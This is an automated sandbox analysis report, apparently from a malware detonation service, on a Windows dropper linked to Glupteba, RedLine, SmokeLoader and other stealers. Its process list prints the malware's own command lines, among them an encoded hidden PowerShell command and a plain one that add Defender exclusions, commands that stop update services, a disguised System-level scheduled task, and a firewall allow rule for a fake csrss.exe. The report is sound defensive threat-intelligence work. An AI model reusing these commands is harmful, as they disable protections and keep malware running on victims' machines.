Analysis Overview
SHA256
2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0
Threat Level: Known bad
The file NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe was found to be: Known bad.
Malicious Activity Summary
Glupteba
Detect Mystic stealer payload
SectopRAT payload
Mystic
Glupteba payload
RedLine payload
SectopRAT
SmokeLoader
RedLine
ZGRat
Detect ZGRat V1
Stops running service(s)
Downloads MZ/PE file
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
AutoIT Executable
Launches sc.exe
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-11 10:20
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-11 10:20
Reported
2023-11-11 10:23
Platform
win10v2004-20231023-en
Max time kernel
80s
Max time network
156s
Command Line
Signatures
Detect Mystic stealer payload
Detect ZGRat V1
Glupteba
Glupteba payload
Mystic
RedLine
RedLine payload
SectopRAT
SectopRAT payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\214C.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F9AD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FA89.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\214C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2479.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F9AD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\F9AD.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe | N/A |
AutoIT Executable
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2140 set thread context of 8632 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 8144 set thread context of 6400 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\F9AD.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\FA89.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3Nu60AU.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 8632 -ip 8632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8632 -s 540
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Jh0bl33.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\F9AD.exe
C:\Users\Admin\AppData\Local\Temp\F9AD.exe
C:\Users\Admin\AppData\Local\Temp\FA89.exe
C:\Users\Admin\AppData\Local\Temp\FA89.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6692 -ip 6692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 784
C:\Users\Admin\AppData\Local\Temp\214C.exe
C:\Users\Admin\AppData\Local\Temp\214C.exe
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\26CC.exe
C:\Users\Admin\AppData\Local\Temp\26CC.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\2479.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Users\Admin\AppData\Roaming\Tags\Settings.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\E2BA.exe
C:\Users\Admin\AppData\Local\Temp\E2BA.exe
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe
| MD5 | f957b03435205ab6bcb64a6c82c00235 |
| SHA1 | dea886045a85b648462c780420b8ed7d582babf1 |
| SHA256 | 2bbd5f2bbc1fc713cf56184058bf64642562d050e3f5f11d0bd514563905583f |
| SHA512 | 7d9933d1a4a7395dde18a2c3d64e56abace177f95830f241ae928b9ffd2f2bc7316167296e279148a8ce67489d54fcbee5bcfdada898e3bb0051896cf163a4c7 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | bc3354a4cd405a2f2f98e8b343a7d08d |
| SHA1 | 4880d2a987354a3163461fddd2422e905976c5b2 |
| SHA256 | fffc160a4c555057143383fec606841cd2c319f79f52596e0d27322a677dca0b |
| SHA512 | fe349af0497e2aa6933b1acfea9fecd2c1f16da009a06ac7d7f638353283da3ef04e9c3520d33bae6e15ea6190420a27be97f46e5553a538b661af226c241c6b |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | dcbd05276d11111f2dd2a7edf52e3386 |
| SHA1 | f5dc6d418d9fb2d2cfa4af440ec4ff78da8f11ec |
| SHA256 | cea5245bab036b03f89d549c71f47df8a14854b0de515643bf95319ec5af71d4 |
| SHA512 | 5f1a9c993cd5394e23b39c43cc7479355c922d1ee8ea48109bbad805209dee697e20759257eca9e2f1b75d34a8c4b4c428a736fa8a468dc18de6c44cb6394846 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\e48107e5-45ff-4040-8b4b-8a2349abd802\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\e48107e5-45ff-4040-8b4b-8a2349abd802\index-dir\the-real-index~RFe592dad.TMP
C:\Users\Admin\AppData\Local\Temp\latestX.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nlvxbtjo.2wf.ps1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe597035.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b679db8b-e7d4-4d5a-9abc-4b56d135d375\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\b679db8b-e7d4-4d5a-9abc-4b56d135d375\index-dir\the-real-index~RFe59c039.TMP